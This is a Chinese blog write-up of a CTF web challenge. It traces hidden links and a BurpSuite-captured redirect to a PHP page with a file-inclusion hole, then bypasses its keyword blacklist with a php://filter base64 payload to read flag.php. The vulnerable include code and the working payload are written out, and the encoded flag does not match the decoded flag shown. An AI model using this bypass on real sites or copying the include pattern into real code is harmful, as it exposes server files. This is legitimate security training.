BUUCTF WEB [极客大挑战 2019]Secret File

阅读 57

2022-04-13

BUUCTF WEB [极客大挑战 2019]Secret File

  • 启动后效果如下

请添加图片描述

  • F12查看源代码

    <!DOCTYPE html>
    
    <html>
    
    <style type="text/css" >
    #master {
        position:absolute;
        left:44%;
        bottom:0;
        text-align :center;
            }
            p,h1 {
                    cursor: default;
            }
    </style>
    
            <head>
                    <meta charset="utf-8">
                    <title>蒋璐源的秘密</title>
            </head>
    
            <body style="background-color:black;"><br><br><br><br><br><br>
    
                <h1 style="font-family:verdana;color:red;text-align:center;">你想知道蒋璐源的秘密么?</h1><br><br><br>
    
                <p style="font-family:arial;color:red;font-size:20px;text-align:center;">想要的话可以给你,去找吧!把一切都放在那里了!</p>
                <a id="master" href="./Archive_room.php" style="background-color:#000000;height:70px;width:200px;color:black;left:44%;cursor:default;">Oh! You found me</a>
                <div style="position: absolute;bottom: 0;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>
            </body>
    </html>
    

    其中一段代码包含一个跳转链接

    <a id="master" href="./Archive_room.php" style="background-color:#000000;height:70px;width:200px;color:black;left:44%;cursor:default;">Oh! You found me</a>
    
  • 尝试访问Archive_room.php

请添加图片描述

  • 点击SECRET按钮后自动跳转到end.php中

1

  • 使用BurpSuite抓包,得知中间会访问action.php。放入Repeater中发送请求包

    GET /action.php HTTP/1.1
    Host: b1dd1aed-6389-452a-8c8e-8f0363d3f057.node4.buuoj.cn:81
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://b1dd1aed-6389-452a-8c8e-8f0363d3f057.node4.buuoj.cn:81/Archive_room.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    

    得到响应包如下

    HTTP/1.1 302 Found
    Server: openresty
    Date: Sat, 09 Apr 2022 02:40:03 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    Location: end.php
    X-Powered-By: PHP/7.3.11
    Content-Length: 63
    
    <!DOCTYPE html>
    
    <html>
    <!--
       secr3t.php        
    -->
    </html>
    
  • 访问secr3t.php

    <html>
        <title>secret</title>
        <meta charset="UTF-8">
    <?php
        highlight_file(__FILE__);
        error_reporting(0);
        $file=$_GET['file'];
        if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
            echo "Oh no!";
            exit();
        }
        include($file); 
    //flag放在了flag.php里
    ?>
    </html>
    

    可以看出这是一个文件包含漏洞

关于过滤

<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
  1. strstr函数

    strstr(string $haystack, mixed $needle, bool $before_needle = false): string
    

    用于查找字符串的首次出现, 返回 haystack 字符串从 needle 第一次出现的位置开始到 haystack 结尾的字符串。

    区分大小写

  2. stristr函数

    stristr(string $haystack, mixed $needle, bool $before_needle = false): string
    

    作用同strstr,忽略大小

可见代码过滤了$file变量中的../ tp input data等敏感字符串,其中input data均是用于文件包含漏洞PHP伪协议的关键字。

可以利用filter伪协议进行文件包含读取flag.php文件中的内容

构造payload/secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php

得到base64编码的文件内容:

PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7MmZkNzFiODAtYzFmMi00YzdjLWI4YmMtNjQ2NWY5NDg3MWZlfSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=

解密后得到flag

<!DOCTYPE html>

<html>

    <head>
        <meta charset="utf-8">
        <title>FLAG</title>
    </head>

    <body style="background-color:black;"><br><br><br><br><br><br>
        
        <h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br>
        
        <p style="font-family:arial;color:red;font-size:20px;text-align:center;">
            <?php
                echo "我就在这里";
                $flag = 'flag{3be9e2b1-0e53-48e4-987b-0aacef0c9547}';
                $secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
            ?>
        </p>
    </body>

</html>

精彩评论(0)

0 0 举报